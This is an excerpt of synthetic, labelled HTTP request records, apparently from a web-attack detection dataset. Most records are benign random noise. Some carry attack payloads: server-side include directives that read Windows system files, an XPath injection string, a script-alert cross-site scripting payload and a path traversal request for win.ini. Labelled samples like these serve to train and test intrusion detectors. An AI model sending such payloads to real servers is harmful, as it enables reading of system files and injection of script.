Proxy-Authorization: Basic emg1ZWk5ZWE6NHNMZWdEdTk=
Authorization: NTLM Z3VjYWVzbXp6b2FuYUhubWZ3YXBhaXRvc29ybW9zbUYxeXJnZGN0cmVvY2VsbXNu
Range: -66
Referer: /Rfiteyct/0otYwiof/2nne.nsf
TE: trailers
Trailer: Max-Forwards
User-Agent: si1xeed
UA-CPU: x86
UA-Disp: 814,8344,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 9.2 www.dcHe.tiff, 8.8 247.174.49.81
Transfer-Encoding: compress
Upgrade: giet/3.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 32378960313
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42217
Start - Id: 30702
class: Valid
GET /ezltn4WVxRhVXRa2/hd8gwtEJVE7DjEJ2QE/hNUsZDCEwlG/4d8cS/l2oCVrRIc3XLt6yj-/iXhPJn0cSPR3E3/nenoh7.shtml? HTTP/1.0
Host: 82.121.225.12
Connection: close
Accept: video/*;q=0.7
Accept-Charset: iso-8859-1;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 141.130.110.165
Cookie: eaosihfwRch=4740;-sk5=exwNW9E;vietnirt=3796459690;mvA5t7kac=aretbol
Cookie2: $Version="524"
Date: Fri, 21 Oct 05 20:20:05 UTC
ETag: "Ji4v@0anvqZzPHf9dA"
Expect: 100-continue
From: aeec@eeAs.fr
If-Modified-Since: Thu, 13 Aug 09 04:17:29 GMT
If-Unmodified-Since: Wed, 08 Apr 09 04:52:24 CET
If-Match: *
If-None-Match: "z9dcGkpRns9l7Nz"
If-Range: Wed, 17 Nov 04 11:44:41 CET
Max-Forwards: 512
MIME-Version: 7.4
Pragma: hhm8es=l
Proxy-Authorization: Digest response="2A65cd9EabBC61E562DdDFBfeDaAebf9"
Authorization: Basic dHhydHJuNzpleHJmcEZteQ==
Range: 17470-
Referer: http://ixre.it/avarrPm/cutgetn/aCcti/a4ccnaSh.gif
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.1 (compatible; Konqueror/4.9; WinNT; hmxcT)
UA-CPU: 68000
UA-Disp: 9503,087,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7462x1873
Via: 4.1 10.180.187.65:951, 1.8 www.lh8i.htm, ntltec/2.2 157.52.72.206
Transfer-Encoding: hioh
Upgrade: caib/8.0
Warning: 176 13.80.15.132 "eeuoufKlwEfnriC" "Wed, 11 Jul 07 03:21:01 UTC"
X-Forwarded-For: 229.134.94.56
X-Serial-Number: 62673072943112918
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30702
Start - Id: 5719
class: Valid
POST /rrx4io87/Rwstfuonterrs/rhiF/erasaoein/X_dhLT6whP/2x5AF6/b6yiinseoimeoc/Pboot.inivZ/O5echouZ/7mhd/lU6y@GbmF/wPENtwPHP8Dw3jEwtPvW.pl? HTTP/1.0
Content-Length: 247
Content-Language: cnwavst
Content-Encoding: deflate
Content-Location: http://www.holf.fr/osc7na.png
Content-MD5: V3FlelRMdGNkb2VuYm50cw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 11:46:19 CET
Last-Modified: Thu, 09 Jun 05 07:35:11 CET
Host: www.rrnly.cz:80
Connection: close
Accept: video/*;q=0.8, audio/*, video/quicktime
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.0
Accept-Language: *
Cache-Control: ds=slo
Client-ip: 219.146.51.19
Cookie: tj=coN
Cookie2: $Version="32"
Date: Wed, 13 Oct 04 15:02:03 CET
ETag: "VVGNW8zSXxQI4.C1N"
Expect: yt8eeyi
From: ototLn2u@5heey.uk
If-Modified-Since: Sat, 30 Oct 04 12:51:36 GMT
If-Unmodified-Since: Fri, 08 May 09 08:11:09 CET
If-Match: *
If-None-Match: "LjU4m1B1M-dh@A0jyk"
If-Range: Thu, 24 Mar 05 08:08:00 UTC
Max-Forwards: 92
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: eCsLn ceokfn=Oc6eq
Authorization: NTLM cm9uaUZhblRneXM4bnlhdGJzbmlyZWFxcmlzcmNubzJpdGNz
Range: 40090-
Referer: /aeES/5zoeao/soTawef.nsf
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 3.5; wt-lm; rv:9.3.8) Gecko/35008668
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: 2.6 154.3.30.162
Transfer-Encoding: compress
Upgrade: T2a/6.5, Xer3t/3.4
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 7835393170
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

iTejUeldEzess=orrxto&a&es=/sc&lgnnAKuTp=235259795&kVjb7blBb=61297&T3odocumentpositionPV=128&eqErs=87249&hxHBwhti2lBum=areqtte2s&q0ws5ii=8mWpre&isvgoSsn=hthnE0/o%j$5/jAdn6&phj5cvMWbeopen=panfbapuAuose&i8Stnt=emam&ideNdpwtnhe=rsulfcemAon

End - Id: 5719
Start - Id: 12982
class: Valid
GET /GM.mspx? HTTP/1.0
Host: 120.176.189.136:42619
Connection: close
Accept: application/x-tar;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: eipdh-coldxnf, qda-ustidr4, 0fIo5-el;q=0.4
Cache-Control: no-cache
Client-ip: 57.159.14.47
Cookie: gactb5ierhai3=rimcopybodydiEe1N;th8tlhoOriixgi=D2n;slc0geofEh8=4~;
Cookie2: $Version="3"
Date: Wed, 12 Jan 05 06:58:29 UTC
ETag: W/"@dtr3ZETT_u3A8ZN_"
Expect: 100-continue
From: picsvpm@izhyigm.biz
If-Modified-Since: Thu, 01 Dec 05 09:25:17 CET
If-Unmodified-Since: Sat, 30 Aug 08 15:10:44 UTC
If-Match: "nV4C4hNh1N4Yqysd1"
If-None-Match: *
If-Range: Mon, 10 Oct 05 03:26:28 GMT
Max-Forwards: 843
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic cjdHaGVsOm9zZW5tbklv
Authorization: NTLM ZWcyYzduaXVvYXRhUGRsOXRlOWhpaXNueGFjZW90bG5oaXNidWhwNnJ5dGFu
Range: -1257,71-2411,674-
Referer: /dfr1nts3/drilhd/nzaDv.js
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.3 (Windows; U; WinNT 0.5; ea-ea; rv:1.4.8) Gecko/64400282
UA-CPU: MIPS
UA-Disp: 8913,250,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 752x029
Via: 7.1 106.27.113.119, 3.4 www.aabfjcoI.html
Transfer-Encoding: identity
Upgrade: iyr/1.7, i8et/9.1, hhek/1.3
Warning: 559 www.Eify.gif "Vlan" "Wed, 28 Jan 04 10:01:33 GMT"
X-Forwarded-For: 234.188.207.127
X-Serial-Number: 39169260132979
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12982
Start - Id: 12760
class: Valid
GET /6y4yeIdeNnskans6at1o/rtaxetmhlne/iEezey3irBnbOtngsi/tsOys5rnoaOo8nonsol7/wRu0g_@Tn1EBWDuAn-yb/@havinglnodeiB35/pnvetooesrt0sdadi/lztnassdns/wit6iccO7croeoc.bin?cmauei=zFhamxc%24%5C HTTP/1.1
Host: www.sjtvemiia.st:80
Connection: wstemhi
Accept: */*;q=0.5
Accept-Charset: euc-tw, utf-7;q=0.4, utf-8;q=0.7, euc-tw;q=0.9, x-mac-korean
Accept-Encoding: *;q=0.3
Accept-Language: de-ta, D9hsod-eoet;q=0.0, Onys-sjn;q=0.4
Cache-Control: no-store
Client-ip: 4.223.155.209
Cookie: owguebg7=131mpbexec| rtelnetn+]s;getaitanureehto=I9o4slthexecposition<1grw[oeul
Cookie2: $Version="1"
Date: Fri, 16 Nov 07 15:24:31 UTC
ETag: W/"7UpOQ9pxCWpDd78BH5XA"
Expect: 100-continue
From: ahe6lcme@tscunoU.st
If-Modified-Since: Sun, 25 Oct 09 18:45:04 CET
If-Unmodified-Since: Tue, 16 Oct 07 02:39:56 CET
If-Match: *
If-None-Match: "t13gmVtvWO@GOAn"
If-Range: *
Max-Forwards: 50
MIME-Version: 7.6
Pragma: tEtn='zKlr'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Digest nonce
Range: 23407-76
Referer: /oynuetsa.tiff
TE: gzip,deflate,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (X11; U; Open BSD i586 5.0; sh-ts; rv:0.1.2) Gecko/94046680
UA-CPU: MIPS
UA-Disp: 8183,952,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6833x519
Via: HTTP/3.1 182.89.231.0, 9.2 11.186.89.24, 4.6 www.rsOomg.jpg
Transfer-Encoding: adrI; rnta=ta1si
Upgrade: al9/4.2, fue/6.6
Warning: 595 www.sEdyesc.html:10 "ssEsgqu" "Mon, 08 Sep 08 09:37:27 CET"
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 66246
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12760
Start - Id: 40434
class: SSI
POST /Yooeegeloschtudjqol/yk6C9OLyH7XzTvU.shtml? HTTP/1.1
Content-Length: 247
Content-Language: pmlenbY
Content-Encoding: identity
Content-Location: /6ncmsa/esIoisu/absbrom/fi3cil.html
Content-MD5: aGZuZ1V0ZGtjdGVBYmRCRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Dec 09 13:56:52 UTC
Last-Modified: Sun, 11 Feb 07 04:00:48 GMT
Host: www.eu06drasta.ch
Connection: close
Accept: application/*, image/jpeg
Accept-Charset: utf-8, windows-1257;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.7
Cache-Control: max-stale=13332
Client-ip: 216.241.175.64
Cookie: 5epaleo=876
Cookie2: $Version="28"
Date: Tue, 04 Mar 08 05:30:13 UTC
From: 7UseiIn@dhxnetcel.fr
If-Modified-Since: Wed, 01 Apr 09 24:11:45 UTC
If-Unmodified-Since: Mon, 08 Dec 08 13:03:13 GMT
If-Match: *
If-None-Match: *
If-Range: "d3_-lFS6vOLvn5GB"
Max-Forwards: 2475
MIME-Version: 3.6
Pragma: no-cache
Authorization: NTLM aFNmbm1lMmV0c3IydUVlNlNhbmE1bm9qZWNhNnBnZzJobGxsc2VidFc=
Referer: http://www.R8ihof.ch/oeiihan/hTane/meri8a/eqnrnacg/rm6ee.pl
User-Agent: iAG78Bu_ http://www.oelIdgn.org
UA-Disp: 477,071,32
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~

eobdhnaup5iIbo=dAZ.YP&BM.U=zBu&esrtseatien=lhocunpI11eo&1ooreee=iOtlg&9antneo8vl=n9ehb&mtise=ePoj0ni&smMiyhInInuur8o=so|sht /htnodee&eE7cavtdnbd=oiiA9a&oaythfrvraosyi=<!--  #include     virtual="c:\winnt\system.ini"     -->

End - Id: 40434
Start - Id: 40386
class: SSI
GET /tcrsaRnatcr/sN-76S7pKxEWcm/aaxKK8QYvXo10/dXT7zmPU75L_HZ8WRl/pM.KSPjXmhttpszIo/EowessnusualosIoqett.nsf?etoco7onnEsoa=98&nwIahsPr5a=56811749&c4t8tecjdaouo=782&Qp.z=seiindh3%5Cd&s0zztduynj9o=bqh6RU_Ih-&tnlxttea=c5isdbhrz&eElq=aAtSi0&nph7n1bIReiC=rorzqn+i HTTP/1.1
Host: 58.40.214.47:80
Connection: fclb3o
Accept: image/*, application/zip
Accept-Charset: utf-7;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: elcMmIw='thdonn'
Cookie: pIGibrinMLq=<!--    #include    virtual="d:\windows\autoexec.bat"     -->;ClehHumtd=]due <ETron\edlpe7$;aenTi=i-Eacylaeo
Cookie2: $Version="7"
Date: Fri, 20 Jun 08 06:06:05 GMT
ETag: "Rmp0qzHvH1zIbRSIv"
Expect: 100-continue
From: loaTs@utd7g.cz
If-Modified-Since: Tue, 30 May 06 20:00:28 CET
If-Unmodified-Since: Thu, 26 Jun 08 18:02:15 CET
If-Match: "DP9bmvKAUnza.R9"
If-None-Match: "RTjUnbpfbfrve3W"
If-Range: Mon, 06 Feb 06 22:02:10 GMT
Max-Forwards: 39
Proxy-Authorization: Basic cmV1ZzpxZW50dA==
Authorization: Basic T2tyb3Q6b2N3aA==
Referer: /8exso/itiaooe0/Kuh1i6hu.doc
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.7 (X11; U; Unix 8.6; 2b-ar; rv:1.6.7) Gecko/76167115
Via: HTTP/3.4 97.122.29.168
Transfer-Encoding: gzip
Upgrade: ytqi/4.6, eenn/3.4, hEy7h/5.6
Warning: 987 59.171.200.42 "hackaeidtruoeai03z" 
X-Forwarded-For: 118.118.53.192
----: -----------

null

End - Id: 40386
Start - Id: 49459
class: XPathInjection
GET /nb_ko-/fsetRjvAafhn/oyYPMps/rwPpF/d8telnet9EEnph-4/Ntelnet/l8/ZPJ4u@xp_h/Niludnlrj492csfiho8t.tiff?romsxh=IAGIe%27+++or+++6+++++%3C++++count%28path%2Fchild%3A%3A*%29++++or++%275nrdiey%27++%3D+++%27&oiteeputreIe45=tlgw HTTP/1.1
Host: www.aheY5snew8.net
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-hebrew, iso-8859-8
Accept-Encoding: compress, gzip, deflate, gzip, gzip;q=0.5
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 5.36.126.231
Cookie: uciekntFmetemnl=4024;CaAyogeeh9=74;odrvgh9N=systemnhttps0a;lh=dxine;ptets1=Ee2admin;gwz=82
Cookie2: $Version="817"
Date: Sun, 01 Mar 09 17:03:12 GMT
ETag: W/"RvhtSSeefa@GeYDYZ."
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 25 Dec 08 18:25:57 CET
If-Unmodified-Since: Sun, 13 Dec 09 23:43:14 UTC
If-Match: "vRcBu9hPH_EqJcU"
If-None-Match: *
If-Range: Tue, 12 Oct 04 10:12:57 CET
Max-Forwards: 52
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: Digest qop=auth-int
Range: -012
Referer: http://mxersr.st/tlsuizc/miFtat/stsdf/bn0mc/Hi4eser.msf
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/2.5 (compatible; Konqueror/1.1; WinNT; 7daaeteae)
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 527x1451
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: identity
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 16.113.150.28
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49459
Start - Id: 1014
class: Valid
GET /ualtwhoA1e.htm?is=tr6t HTTP/1.0
Host: 130.13.92.211:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-1;q=0.2, cp-950
Accept-Encoding: identity;q=0.9, compress;q=0.2
Accept-Language: rhamR1ss-6eeti, ho8-pm;q=0.2
Cache-Control: only-if-cached
Client-ip: 54.9.122.101
Cookie: tpsaampav0homae=nsPs-V9@J6l
Cookie2: $Version="8"
Date: Fri, 13 Oct 06 14:09:30 UTC
ETag: W/"2fNKM6ip3EraUsNKVl"
Expect: 100-continue
From: iyiqd@OJte.cz
If-Modified-Since: Wed, 21 Feb 07 04:26:54 CET
If-Unmodified-Since: Sun, 02 Jul 06 13:42:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 20 Nov 09 17:52:12 GMT
Max-Forwards: 6728
MIME-Version: 5.1
Pragma: ad8dg=ie4oi
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 9-72361,672405-
Referer: http://www.odr6c7.cz/onxs/ooagD/eyhnp/0ynizmlB/n1SCrasl.asmx
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/3.4 (Windows; U; Windows NT 1.6; uo-eb; rv:5.8.6) Gecko/85621340
UA-CPU: x86
UA-Disp: 419,762,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 9.7 www.7sEslgr.jpeg:4, 0.5 www.bfljhe7y.gif, FTP/6.2 123.121.14.98
Transfer-Encoding: isre
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 066 226.235.175.144 "s4tnneibase" "Tue, 09 Mar 10 24:22:21 GMT"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1014
Start - Id: 47972
class: XSS
GET /gim/httpfLYV/1seostmwa/ta/h5H-HP/tHIj8C/7kn.dll?iaisots9leejR=%3Cscript++++%3Ealert%28%27erqlaahbweua.t3hn0m%27%29%3C%2Fscript+%3E&sy3nde=+B%3Bt&nczdi1orLndTye=mf&t1cdiCj=667430&Uall22w1rPhkBL=oinserto+y HTTP/1.1
Host: www.2ibsr.de
Connection: rntki
Accept: application/*;q=0.9
Accept-Charset: shift_jis;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=44
Client-ip: 8.102.174.32
Cookie: mY0home= e 7'
Cookie2: $Version="1"
Date: Mon, 03 Nov 08 01:56:57 UTC
ETag: W/"YuclQnAaadN.hM_u"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Sat, 27 Mar 04 24:47:05 CET
If-Unmodified-Since: Tue, 10 Apr 07 07:30:45 GMT
If-Match: *
If-None-Match: "887Fo5sXhleEm8XwKC"
If-Range: Sun, 11 Oct 09 14:58:12 UTC
Max-Forwards: 51
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM MEllYUVzY2hlTmVkYXVzb2Flb3llU3N1bmFpMWF0cmM4bHV0bnUwdHM=
Authorization: Basic ZHFSZXRtOnJ1YWVF
Range: -3122,1126-
Referer: http://95yrt.it/toEyhe/geYhtilt/toollote.cgi
TE: chunked
Trailer: User-Agent
User-Agent: umwtttarns/9.5
UA-CPU: 68000
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.6 www.g2ot.js, 0.4 www.d9si.tiff, Ilutln/4.5 www.lensTo.shtml
Transfer-Encoding: deflate
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 31.111.134.242
X-Serial-Number: 41529
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47972
Start - Id: 29084
class: Valid
GET /2yJNebSO-1x.ct/eq/oCiviok_47l3QRJwL_iZ/cpvt1ineltbtrginlho/Lhpsot/07/cohHwothahmoa5et7gZ/mzPMC/oZk5QTSpfromn7/aobrreet1shtdea/EltdeEe/nautoexecgFhNqpSAoE..pl?xmllikepaincludeh=8KN6.sYnCus&rtd3nt=zmghOdiv%7Eh%29n+se5dc&hhr3=43216684&VI.JyFz=koo%2Bn HTTP/1.1
Host: www.chil9ymqhl.de:9994
Connection: close
Accept: text/*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.1, compress;q=0.7
Accept-Language: p-td, Nt-tiyil, ysdetE-S, dxtnPzec-er6nt, tAstd2-vEiia;q=0.7
Cache-Control: max-stale=6739
Client-ip: 208.167.239.177
Cookie: MHd3Tegs6ihe9h2=9;ch9nawotrw=3670
Cookie2: $Version="61"
Date: Sun, 18 Dec 05 08:08:53 UTC
ETag: ".a2d8bCjaE9.p6WkFJ"
Expect: A0doma=dnsmemo
From: syrdl@6euah60oan.net
If-Modified-Since: Sat, 09 Oct 04 19:26:39 UTC
If-Unmodified-Since: Mon, 18 Jun 07 14:45:55 UTC
If-Match: "8dAQw_Dcp_mjqfObalR"
If-None-Match: "z0kffQygBfdjn-eo4tAo"
If-Range: Fri, 21 Aug 09 23:52:37 GMT
Max-Forwards: 0372
MIME-Version: 8.2
Pragma: l=dysi6
Proxy-Authorization: Digest realm
Authorization: NTLM YWFuWW9OZVR5d25vbXJwUzJzRzZuZXh0VGFFZWlkY29kaWR5c2E3czFz
Range: -5612
Referer: http://sekcuaS.org/4efaar5/iSTp/tfhh2.wav
TE: trailers
Trailer: Accept
User-Agent: itiiuT6r (wXYU51F; eJw-Q2D; 8kCHvvN)
UA-CPU: x86
UA-Disp: 7928,6331,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7035x2807
Via: snre/6.9 82.142.246.234, 5.6 166.115.202.243
Transfer-Encoding: gzip
Upgrade: teav/2.5, xneK/0.8, ecrUt/0.0, a8tr/4.9
Warning: 929 www.3dntro.js "lebaflentiiernr" 
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29084
Start - Id: 7467
class: Valid
PUT /trospay8wrtNhaEee.mdb? HTTP/1.1
Content-Length: 101
Content-Language: gsygNr,tnrcati2,i
Content-Encoding: gzip
Content-Location: /eei0t/T2ot/4FsLe.swf
Content-MD5: aGVyaWNzZnR0Z2FuaWNybg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 03:23:56 UTC
Last-Modified: Fri, 07 Jan 05 23:38:54 CET
Host: www.aiteenk.fr
Connection: habeeoi
Accept: */*;q=0.1
Accept-Charset: iso-8859-3;q=0.6, x-mac-japanese
Accept-Encoding: gzip;q=0.5, deflate
Accept-Language: N-im3iyrA, hyzyE-oro, at1i-prsh, tntrecoQ-oadi;q=0.1, 2drrg-holhbcl
Cache-Control: no-store
Client-ip: 104.160.13.173
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="923"
Date: Sun, 22 Apr 07 18:55:48 GMT
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: oOhnhs
From: simeoAtp@bzmstxmta.de
If-Modified-Since: Sat, 09 Aug 08 16:44:28 CET
If-Unmodified-Since: Tue, 11 Aug 09 19:42:23 UTC
If-Match: "E95nK_AixWXknxP2MErj"
If-None-Match: *
If-Range: "qBmTlWu806NQUFi"
Max-Forwards: 22
MIME-Version: 9.0
Pragma: Dmes=Ti
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: Digest uri=http://www.d7c9ue.it/ngnreaeo.png
Range: -471
Referer: /soath.nsf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 7.7; op-eh; rv:4.1.6) Gecko/91462551
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 871x804
Via: HTTP/1.5 www.tncn.shtml, HTTP/8.6 145.68.185.255, 9.6 www.vDowlsI.htm
Transfer-Encoding: fmir; 9afkauzn=m52drd3n
Upgrade: omrin/0.6
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 119603156999
----: -----------
~~~~~: ~~~~~~~~~~~~

tr=1oo0cinravgaTx&amabhGtpjIDemr=96869&2bs5tishD=esoa ilnrEa&uE54cva=90366225&ssUNuMzhtdokr=ppH?&

End - Id: 7467
Start - Id: 45136
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.1
Host: www.r2ttshxme.de
Connection: trcndw2
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-sossgre
Cache-Control: no-transform
Client-ip: 175.81.181.89
Cookie: 0jBVf05VtRB9=6KitleDp;adTq4=ssma;access_logtpassthruYWc=3;ewMtehq1dncio1=r~sEcrGemininclude
Cookie2: $Version="6"
Date: Thu, 24 Jun 04 01:26:13 UTC
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: ydgsh@esUe.cz
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 03 Feb 09 01:03:48 UTC
Max-Forwards: 064
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: NTLM bW5pZ29pM243ZXBkSDd3bnlvbkZtUmliYTMwbnRteGlpbHN0dXM2
Range: -3,456-488022
Referer: http://f16on.ch/3EaeToe/8nbsmtr.php3
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/7.6 (X11; U; Open BSD i586 3.2; r4-xl; rv:2.4.6) Gecko/16489067
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: 3.0 108.65.25.139:63, 4.4 251.119.173.108, FTP/8.1 228.211.131.56
Transfer-Encoding: gzip
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45136
Start - Id: 26863
class: Valid
GET /3Tsb0fety1hstvam/r7nrdaEcbcttnwahe.gif?5hjtcEslnie0t=233994&h0aabset6Er6=eazdgeeshei&cdq8y=99299&g0utnnz5ttjS=dwne&hhtpassp.=c5OaJgtPNG3&gtpsdrhT=+57ulefruk%3A%24linkdeleAd&ibnc=905&2PVC.1@Ltmp=6962517&diniy=le4o&oe5ubet9s=acnsy&oDoudiR7=sgudcfeihyoyQr HTTP/1.1
Host: 138.211.173.92
Connection: bWeduy0
Accept: image/jpeg, image/*;q=0.4, image/jpeg
Accept-Charset: *
Accept-Encoding: compress, deflate, compress;q=0.0, identity, gzip
Accept-Language: Ohj-4hnsd0b;q=0.0, 9djrh-serfd;q=0.5, essanc-tybAetHn;q=0.4, rcrap-ctt0;q=0.6
Cache-Control: no-cache
Client-ip: 46.49.11.226
Cookie: iuc=rE
Cookie2: $Version="2"
Date: Sun, 20 Feb 05 21:04:52 UTC
ETag: W/"xdLb79xcTRrviWDvb8M"
Expect: nZv2tp
From: wmesh7n@tnizghsdil.be
If-Modified-Since: Fri, 28 Mar 08 17:18:21 UTC
If-Unmodified-Since: Fri, 01 Feb 08 19:30:12 CET
If-Match: "fag7laWnoUOx53IkNAV"
If-None-Match: *
If-Range: "1VxWOS8BUfpgcBRfsO"
Max-Forwards: 92
MIME-Version: 3.7
Pragma: l=o4
Proxy-Authorization: hjMn iHdsResa=dnoc2
Authorization: Digest realm
Range: -6214
Referer: http://www.orivot0o.de/nsvSr/wwl9fner/hteoaesr.exe
TE: gzip;q=0.3,trailers
Trailer: Pragma
User-Agent: Mozilla/6.1 (X11; U; Linux i386 3.4; ee-iu; rv:0.4.0) Gecko/56544458
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: rhaie6/9.7 173.51.227.178
Transfer-Encoding: identity
Upgrade: leh/4.9, tsgto/9.5
Warning: 859 87.196.54.182 "s9ptiys" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26863
Start - Id: 22095
class: Valid
GET /xdbtalrtu0Stte7jcauo/t2VM_FgcbAc@6/9nhvarEhnues/F7.xps20telnetDs6E5d/eLPSywzE2/iCRLGwn/7netah/aiihtsrsmtwsH6citSne/nbQsAQ_nW/u4d435/q8grt9RtaetT.asp? HTTP/1.1
Host: www.dtemnni.cz:80
Connection: ii8t
Accept: */*
Accept-Charset: euc-cn;q=0.0, x-mac-cyrillic, iso-10646-ucs-2;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 172.100.60.135
Cookie: ArrAxdEiy=46961240;idpttnfoezgy=jobjecte7iwnngoiuautoexecqoa;oSrlSfrdtn=00980474
Cookie2: $Version="3"
Date: Tue, 08 May 07 18:52:05 GMT
ETag: W/"lYWZyNUWq8@aWk_jMrW"
Expect: eWnuseym=c7ibb
From: eidhdeG@fpho.st
If-Modified-Since: Fri, 02 Jul 04 03:53:34 UTC
If-Unmodified-Since: Sun, 20 Dec 09 10:16:03 UTC
If-Match: *
If-None-Match: *
If-Range: "BHXBdJN0A49z@-W@sOqt"
Max-Forwards: 178
MIME-Version: 6.5
Pragma: ecnrH='enjir'
Proxy-Authorization: Basic czFoa2FFOm9yaHJ0cA==
Authorization: Digest cnonce="hatFo"
Range: 96-,140-326001,-7
Referer: /kuhe/nneagh.exe
TE: trailers,chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: hom6stnhg (osw1X.; egZ1qzk)
UA-CPU: StrongARM
UA-Disp: 1342,370,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
